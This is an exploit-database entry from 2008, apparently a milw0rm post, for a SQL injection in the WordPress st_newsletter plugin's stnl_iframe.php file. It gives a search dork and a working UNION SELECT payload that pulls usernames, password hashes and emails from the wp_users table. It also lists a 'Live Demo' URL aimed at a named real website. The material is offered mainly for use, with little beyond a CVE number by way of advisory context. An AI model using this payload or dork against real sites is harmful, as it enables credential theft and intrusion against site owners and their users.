WordPress Plugin st_newsletter - 'stnl_iframe.php' SQL Injection
Author: r45c4l
type: webapps
platform: php
port:
date_added: 2008-10-16
date_updated:
verified: 1
codes: OSVDB-49201;CVE-2008-4625
tags: WordPress Plugin
aliases:
screenshot_url:
application_url:
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz #
# and all darkc0de and DarkTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & darktrix.info
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: WordPress stnl_iframe remote sql injection vulnerability
#
#
###########################################################
#
# d0rk: ''stnl_iframe''
#
###########################################################
POC :-
wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
Live Demo:
http://flymusic.co.uk/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
###########################################################
#
# Bug discovered : 18 Oct 2008
###########################################################
# milw0rm.com [2008-10-17]